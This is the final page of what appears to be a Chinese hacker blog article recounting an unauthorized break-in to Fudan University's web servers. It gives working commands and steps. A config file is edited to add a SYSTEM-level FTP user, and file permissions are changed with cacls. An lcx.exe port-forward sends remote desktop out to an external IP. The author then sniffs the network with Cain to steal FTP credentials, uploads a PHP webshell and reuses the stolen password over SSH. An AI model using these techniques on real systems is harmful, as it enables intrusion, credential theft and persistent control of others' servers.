入侵复旦大学

四、守株待兔

      直接连接3389是行不通的，防火墙把我们挡在了外面。不过我们可以用lcx.exe给它来个端口转发。直接用ASPX马或者SU提权马发现都不能执行lcx.exe进行转发，所以我想通过修改Serv-U的配置文件来添加一个具体system权限的FTP用户，再登录上去进行端口转发。就是修改C:\Program Files\Serv-U\ServUDaemon.ini这个文件的内容啦。如何修改我就不废话了，有兴趣的话大家可以去了解下SU配置文件的存放规则，了解之后修改起来就得心应手的了。我就添加了一个用户名为hackest的，拥有system权限的FTP用户。要是配置文件没有权限修改的话，可以用SU提权马执行cacls.exe修改文件属性为everyone完全控制就可以修改的了，不过cacls.exe需要文件格式为NTFS的才可以使用哦。在CMD下登录FTP上去，执行：
C:\Documents and Settings\All Users\Documents\lcx.exe -slave 219.129.213.252 51 127.0.0.1 3389
本机执行：
lcx.exe -listen 51 2007
然后连接本机的的2007端口就可以登录远程服务器了，


如图14。到这里我们就已经成功控制了61.129.42.42这台服务器。接下来就是安装cain进行嗅探了，具体请参照我的另一篇关于嗅探入侵的文章。在61.129.42.42上执行"ipconfig /all"命令得知默认网关为61.129.42.1，


如图15。复旦主站的IP为：61.129.42.5。设置好cain就可以开始嗅探攻击了，嘿嘿。由于一开始的那几天是五一假期时间，嗅了两天一无所获。N天之后终于有进展了，wyzhack告诉我已经成功嗅探到复旦主站的FTP用户名和密码了，


如图16。
对于一个网站，有了FTP密码就等于有了一切！利用FTP上传了一个PHP马，进去参观一下，


如图17。

五、尘埃落定

      到这里就已经完全控制了复旦大学的主站了！虽然主站的操作系统是Linux，但是我们通过先控制一台windows的3389肉鸡再进行对目标的嗅探攻击收到了如期的效果。可见嗅探攻击的威力的确非比寻常，不注意这方面的防范也必将被人恶意入侵！既然是Linux的系统，管理员一般都是用SSL来远程管理服务器的，嘿嘿。扫描一下主站服务器，发现开了22端口（SSL的默认连接端口为22）尝试用嗅到的FTP用户名和密码登录SSL居然成功了，


如图18。至于通过溢出或者其他提权方法来得到root权限，我就不弄了，因为这方面实在不太熟悉。本文主要是介绍一种入侵思路，没有什么技术含量。不得不说的一句话：管理员们要小心嗅探攻击了，嗅探的攻击力可是比较厉害的。如有不妥之处还请大家批评斧正！

上一页  [1] [2] [3] [4] [5]